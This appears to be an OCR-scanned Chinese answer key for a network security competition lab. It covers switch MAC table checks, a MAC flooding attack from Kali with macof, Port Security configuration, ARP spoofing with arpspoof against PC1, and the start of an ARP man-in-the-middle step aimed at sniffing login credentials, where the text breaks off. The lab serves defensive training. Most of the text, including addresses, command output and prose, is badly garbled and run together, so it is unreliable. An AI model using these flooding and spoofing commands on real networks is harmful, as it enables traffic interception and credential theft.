Q10StaticEM￡TMIUSfiSD2S(R4)(CDrfiavlanLOj*EtherntTL/0.1EtherntTl/O/JEtherretl/O/JEtherrctL/O^VLAN1〔J^包含的接口數(shù)＞=3;WebServerIP配置〔與參數(shù)表中效勞器場(chǎng)景的IP地址一致〕：2sSDoGiiim心m七呂<xndGcindnlrtis>ij^G-oiirxgfJindoijsIPConFigrupationEcheFnecadapter本地在：接2：Cnnn?rtdon-cpAtif1cDNSSufFl*.；IFHddf.5③=：192.1￡Q,1.204SubnetMask*.*.*：DefaulcGaeevat/.-.：Ci\Docufncnta?ndSectin^asftdrti.nljtratar>HPC1IP地址配置〔與參數(shù)表中PC1的IP地址一致〕：C-\DocLimemtsandSettings\usei?>ipconfUindousIPGonfigu產(chǎn)ati*nEthernetadapter本地連接二Connection-speciTicDNSSuffix.：IPAddress：11SubnetMask..:Default：PC3IP地址配置〔與參數(shù)表中PC3的IP地址一致〕：

!1承川iI!Ii!Ir.I："1fCDFlfigmthOLinkencap:EthernetHWaddr00:Ck:79;M;62:6c,znetaddr：132.16B.1.213Beast;192,16fi.L255Mask:255,255,255.0znetBaddr.teSO::ZOr：Z9ff:fea4:626cf64Scope:LinkUPBRDAtKASTHUMMINGMULTICfcSIMTU:1S00Metric:1RXpackets358errors:0drcipp*±d;Qoverruns:0fsane10IXpackets44prror^;0droppsd:0overruns;0carri-er：Qtollisione-DtiqueuEten：i口口口,RX.bytes:2^064(24.4TKbytes:7652|7.4KiB)loLinkeni:ap:LoizalLDopbackinetdddr;127.DD1Mask;25,d0.0inetSaddr：;;11/12BScope:HostUPLDDP日A匚qRUNTdIFJEHTUi65536Metric:IRXpackeitE.57errors.Qdl■口口,巨d：0ojerrljns：Qframe：0IXpackets57errors:0dropped:Doverruns:0carrier:0coll,isions-QtMqueuelen;0RXbytes:Z1713(21,2KiB>TXbytes：21713(21.2KiB)三個(gè)終端之間能夠相互Ping通;-心nit呂mudGe七匕in>g[SSAidlnln±星七即a七oh〉士/仁邛山￡1gindcvjs：IPConfigrurationEthetnecadapg?本地莊樓2.：CnnnflPtdon-eperifitDNSSuFf1*.!IPAddicta：1?2A￡0.1.2e4Subnethas^*...：255_255_255.0DefaultGateua^p..?：3￡\DacufticntA?ndCe4:tin^5^dinLniatrLfttoi'>-C;'^JX>cunontu4mdSQ't^in^s'^dnin192.l^S.1.211Pinffinor19?.1.1.211f/ith12nFflata-riL-121TTL=128rTL-128TTL-128RcplvFrom1?2.1riL-121TTL=128rTL-128TTL-128ReplvFrom11：b^tes=32time<lnsReplyFrom192^168.1.211：b^tes-32tine<lnsReplyFrom1724168.1.211：bytes力2tine<lnsPingstatiatic￡for192.1&8.1,211：Facktts：Sent■4,Keceiued-4,Lost■UtMXloss>,Hjpproximditeroundtriptlme^inmilli-seconds：Hininun-Qms,H^xinum?0ii￡,Average■電msC：SDuuutmuHLMand8cLxi13aAliminisluyJ.13TTL=t4TTL=t4riL=i4TTL=64Pinning192.1&S.1.TTL=t4TTL=t4riL=i4TTL=64ReplyFi'Dffl192_1tR_l_213：bijtes=32tIne=2n-RepIvfrom192_1￡S_1_213：bijtes=32time=lnsReplvfrom192.1.它8.1,2:13：hi/tes=32time-InsReplyfrom192.1￡8_1-213：：bi7tes=32time-InsPdngstatisticsfor192_1&8.1.213：Packet蘋(píng);Sent=4,FEecetued=4.Lost=SC0zlossAjiproximteroundtriptime輯innilli-seconds：Nininun=Ins,Naximunk=Zm假設(shè)fAverage=Ins在同一個(gè)窗口ping通除了本機(jī)外的2個(gè)IP地址;.查看DCR咬換機(jī)VLAN10勺MA電址表容量信息,并將DCRS交換機(jī)配置相關(guān)參數(shù)、查看命令、查看結(jié)果截圖.〔3分〕#showmac-address-tablecountvlan10DCRS-5650-28(R4)(confmac-address-tablecountvlan10computethenumberofmacaddress….Maxentriescanbecreatedinthelargestcapacitycard;TOC\o"1-5"\h\zTotalFilterEntryNumberis:16384StaficFilterEntryNumberis：10384unicastFi1terEntryNumberis:LG354Currententrieshavebeencrearedinthesystem:TotalFilterEntryNumberis:Sind5v?dualFilterEntryNumberis:8staticFilterEntryNumberis:0DynamicFilterEntryNumberis:8DCRS-565O-2B(lt4j(conf1g>#DCRSfe址表空間中有可用的空間；當(dāng)前地址表記錄數(shù)少于地址表容量;MaxentiresTotal??…：16384CurrententiresTotal:該數(shù)值小于10.從Kali發(fā)起MACFlooding滲透測(cè)試,使DCR咬換機(jī)的MAC地址表溢出,使其在MAGfe址表溢出的條件下,無(wú)法學(xué)習(xí)到PC1和DCSTfr的WebServ2003效勞器的MACfe址表信息,查看DCR支換機(jī)的MAGfe址表信息,并將滲透測(cè)試過(guò)程截圖.〔5分〕Kali#macofVM一FileEditTerminalHtdp2505291eiwin512de：a2tleiIS:32te2ISte&iMiSbe.e.e.eHIM>A.B.B.A.3255A：￡92444Ml；e〕win51211:2c%@與,$W破1>%MM7;S233LMN〔?1winRabJ45tal：&a：43：71c9t3B：77：49rc4：ale.S.e.e,52SW>9,2970:SLfifi27B2LS4l1U27B2194〔6〕win512儀37:42:J2:?:b:2eA9:lSiS?:b:?t79?MUIMN*5上MUE7G叫比d上47：w；74：f.；&?q36>?.?,*?.3?MtrVlV731?lM:Lft75iei36〔e〕win512at2ci9a：47：eb:7b7b：nfi5B：?2te4:?59.Q.eLQ.3/6L9>e.e.e.e.zaagz：sifi^Tesleti62237HUC?〕win512口出門(mén)：制普：U44m4?,0.9,0.42947>%明H,B,47"3;5194399233船身,伸琥*2間winM2S；7fg7C；X；瓠37；“：74通卜4箝理審,a%%742sL>52???&44；2013598444〔&〕win5Uia：3a：17:fl4：5d：7f3C：23!Mi7l43：??9.0.日,日.1492：S1374249609：13M2軸取e；g：Win512汕融必通i*：〔keb：9i：ai：7diJf129&而**%3罪％#sibhwsm〞g**77ge?eiwin$171II.fd：af：n.c：lb；cGb-1：J4372X：/二上.仇白,5">"明.?.如其亡：亭加和時(shí)打通海&4&973971A〕vMT512^rlr的fi」i：ilh1ri；F#I〔2分〕#showmac-address-tablecountvlan10Computethenumberofmacaddress.Maxentriescanbecreatedinthel&rgestcapacityc&xd:TotalFilterEntryNumber±s:16384StaticFilterEntryNumberis:16394UnicastFilterEntryNumberis：16384Currententrieshavebeencreatedinthesystem:TotalFilterEntryNumber工呂;16394IndividualFxl^terEntryNumberis:1G3S4StaticFilterEntryNumberis：0DynamicFilterEntryNumberis!16384當(dāng)前地址表記錄數(shù)等于地址表容量;MaxentiresTotal??…：16384CurrententiresTotal??…：該數(shù)值=16384〔3分〕

4.Kali翻開(kāi)wireshark,驗(yàn)證在DCR咬換機(jī)MACf4.Kali翻開(kāi)wireshark,驗(yàn)證在DCR咬換機(jī)MACfe址表溢出的條件下,可以監(jiān)聽(tīng)到PC1訪問(wèn)DCS好的WebServ2003效勞器的HTT騎量,并將該驗(yàn)證過(guò)程截圖.〔5分〕PC1通過(guò)InternetExplorer訪問(wèn)；〔截圖〕地址欄包含:效勞器場(chǎng)景IP〔匹配參數(shù)表效勞器場(chǎng)景IP〕/Kali翻開(kāi)wireshark,監(jiān)聽(tīng)到PC1通過(guò)InternetExplorer訪問(wèn)DCSTI艮務(wù)器場(chǎng)景的HTT騎量;AkEdrtLsttieSvalabbcaptureintertazes..nrttpExpre"5siona.Clear內(nèi)沖lyS百峭aFikerr：-"Mu.it□□irF『aEy24001：#21byt日方口門(mén)?3358bit、)-byt/百?向『tursd(3^^bits)?口int■電「1?口咱G二山芒中近工,小廠fu野m&cy即射〃匚卻Fb!氏：川［2a〕.DskXal"“11_過(guò)至刎二jd〔±23二世;a2乂蟲(chóng).InternetProtocol駒『以口口/Srcs18J舶+25a9?(192.ies.252.ao),Dst;192,168,252.111(192.168T尸grwmi事3k白介EritrisLPfuti0上屯BruFort:：;471S7t丐7157】?Dstaurtmhtip(90),攵1』口亡k!】一LanDOOCCOLOCO2CCQ3C皿CCO^CDD7Ocoao009CME工(5254000197版fCSfdf40Z9d32f312b31*韭j.3fd453d笛蒯74Dd:26JO曲7b伽54SfDa43S63□i題6src的00*9IB502eG8C726CH*.E.■也｛H…工.Q>EpP-L?)*=B.GEI/hlTrP/l.l..Ho產(chǎn)舟￡ti*f|tlye.FCacst;n^x-CCtptEt3*a1工網(wǎng)事■L.Tat:152.111..Ca^ikmp"he-Centraca=0…A截圖:Source:PC1的IP地址〔與參數(shù)表一致〕Destination:效勞器場(chǎng)景的IP地址〔與參數(shù)表一致〕Protocol:(5分).在DCR咬換機(jī)Kali所連接端口配置PortSecurity特性,阻止Kali發(fā)起MACFlooding滲透測(cè)試,驗(yàn)證此時(shí)DCR咬換機(jī)MACfe址表能夠?qū)W習(xí)到PC1DCS好的WebServ200期艮務(wù)器的MACfe址,并將DCR咬換機(jī)相關(guān)配置信息以及驗(yàn)證信息截圖.〔8分〕配置截圖包含：mac-address-learningcpu-control〔2分〕在VLAN1的個(gè)接口全部啟用如下:InterfaceEthernet1/0/Xswitchportport-security〔2分〕#clearmac-address-tabledynamic〔2分〕#showmac-address-tablecountvlan10DCRS-5650-28〔R4〕〔config〕^showmac-address-tablecountvlan10computethenumberofmacaddressMaxentriescanbecreatedinthelargestcapacitycard:TOC\o"1-5"\h\zTotalFilterEntryNumberis:16mB4ST^ficFilterEntryNumberis：1&304unica5tFiIterEntryNumberis：16364CurrentEntrieshavebeencreatedinthesystem:TotalFilterEntryNumberis:Sind-fvidualFilterEntryNumberis:8staticFilterEntryNumberis:0DynamicFilterEntryNumberis:8DCRS-5650-23〔R4〕〔config〕#DCRSfe址表空間中有可用的空間；當(dāng)前地址表記錄數(shù)少于地址表容量；MaxentiresTotal??…：16384CurrententiresTotal:該數(shù)值小于10〔2分〕.在DCR支換機(jī)配置PortSecurity特性的條件下,Kali再次翻開(kāi)wireshark,監(jiān)聽(tīng)PC1訪問(wèn)DCST^的WebServ2003效勞器流量,驗(yàn)證此時(shí)Kali無(wú)法監(jiān)聽(tīng)到PC1訪問(wèn)DCSTH勺WebServ200陰艮務(wù)器的HTT騎量,并將驗(yàn)證過(guò)程截圖.〔7分〕PC1通過(guò)InternetExplorer訪問(wèn)效勞器場(chǎng)景；〔截圖〕地址欄包含：效勞器場(chǎng)景IP〔匹配參數(shù)表效勞器場(chǎng)景IP〕/……Kali翻開(kāi)wireshark,監(jiān)聽(tīng)不到PC1通過(guò)InternetExplorer訪問(wèn)DCS面HTT騎量；〔截圖〕Filter:顯示報(bào)文數(shù)：空任務(wù)5:數(shù)據(jù)竊取防護(hù)：AR■防〔45分〕.在PC1訪問(wèn)DCS井的WebServ2003I艮務(wù)器時(shí),查看PC1和DCST中的WebServ2003效勞器的ARPg存信息,并將PC1和DCST中的WebServ2003效勞器的ARPg存信息截圖.〔5分〕PC1WebServ2003Ipconfig/all分別顯示PC1WebServ2003的IP和MACPC1的IP和MAC以太網(wǎng)迪配器&撾!造建士般特定的DHG般特定的DHG后綴

瑞林皿：：：：：：VHCF^用?段屏宣包啟用地址IPv4DIICT^CIA(DMmPC(cGDEFufiil^CuvitrullerFC=3F-DB-8G-4a-2fi工THF把KH：：FcM：afal:一儲(chǔ)：苜選,192.1GH.2&2.90<^^>319521307效勞器效勞器場(chǎng)景的IP和MACEthcnnctad.aptci&玄世1壬望2：CoConncct;ion—specif±cDNGGufflxDc^GirlptIonHICPliy3xcaJkDddi'cas.DHCPEhailed.IPA.■■■■■■**?■CubnetHaak■■■■■■**■DefaultGatcirMy￡ncaltclfRTL8139FcuTiilyPCIFastEthernets52-G400AD：Nos172.1G9.252.111i25&.255.25S.0i172,1G9.252.101PC1通過(guò)InternetExplorer訪問(wèn)效勞器場(chǎng)景；〔截圖〕地址欄包含：效勞器場(chǎng)景IP〔匹配參數(shù)表效勞器場(chǎng)景IP〕/PC1AR戲項(xiàng)內(nèi)容為WebServ2003勺IP->WebServ2003的真實(shí)的MACCs^UstrrsdmljiIrdLur>Etrp-u除口；1?2fi168<252.90——0xdIntCTfiM地價(jià)物瑁地址192.1A8.25Z.1PR(W-1fi-31-f3-7a-f6192.lk8.Z5Z,11152-54-HHha3-46-adWebServ2003AR昧項(xiàng)內(nèi)容為PC1的IP->PC1的真實(shí)的MAC

C：Miocimerit?andSettInosxfldnii>Istratof『aTnterfacr；192.1fiB.2S2.111——■flx1InternetftridressFhysicalAddressTjnifi192,168,252.fc-3f-dh-8c-4B-Zad4mHmic.在Kali對(duì)PC1進(jìn)行ARPSpoofing滲透測(cè)試,使PC1無(wú)法訪問(wèn)DCS種的WebServ2003效勞器,PC1的ARF^存為：DCS日的WebServ2003效勞器IP->Kali的MACfe址,在PC1查看被Kali毒化后的ARFS存信息,并將該信息截圖.〔5分〕Kali:#arpspoof-tPC1_IPWebServ2003_IPrnoTifjhtrnoTifjht：-+arpspooffttif：db：Rct-ia：?^192.168.2521110:[:PQMl:5：Bt>e：C!29；41：5：8be：c:29;41;5：Bb0:C:2H:4L:5:Bt>：54bg：C：29:41:5:Bb:5:8bth[："二曲⑶后bfc；jf：db：ac；4a：watc:3f；db:8c:*lS;2afc：if：db：aci4d：2afc：3f;db;dc:4G;2afcilf!db3Bc：4n：2jesofi42:arprepl/42：arpreply6B6GA2：arpreplyL；<n"：rr「epi?QUUti42；arpreply42：口reply1923fia192.163.2^2H111192.168.352.111192.Its.252.11111*2.ItU.252.111l9JnlfiB252.111ISat6：￡：Z隊(duì)41isate：c：293115-atfl:c:29:4115-8tB:C:29141IS-attl;C：29；41isat〔過(guò)程截圖〕〔2分〕PC1ARRg項(xiàng)內(nèi)容為WebServ2003勺IP->Kali的MAC瞿窸?□：192.lfiS.2E2.96-瞿窸Internet地ij物理地址192.16S.252.ia8W1&-3113-7*fG1106-00-39-41'0S-9bKaliMAC:ifconfig〔截圖〕rfiatighr：*ifconfigethlLinkencap:EthernetHKaddr96:0c:29:41:05:8b

〔3分〕.在Kali對(duì)PC1和DCS種的WebServ2003l艮務(wù)器進(jìn)行AR兩間人滲透測(cè)試,使Kali能夠使用wireshark監(jiān)聽(tīng)到PC1向DCST中的WebServ2003I艮務(wù)器的LoginAuth.php頁(yè)面提交的登錄網(wǎng)站用戶名、密碼參數(shù),并將該滲透測(cè)試過(guò)程截圖.〔7分〕Kali:#arpspoof-tPC1_IPWebServ2003_IPfdiiIi#irp±pubtfdiiIi#irp±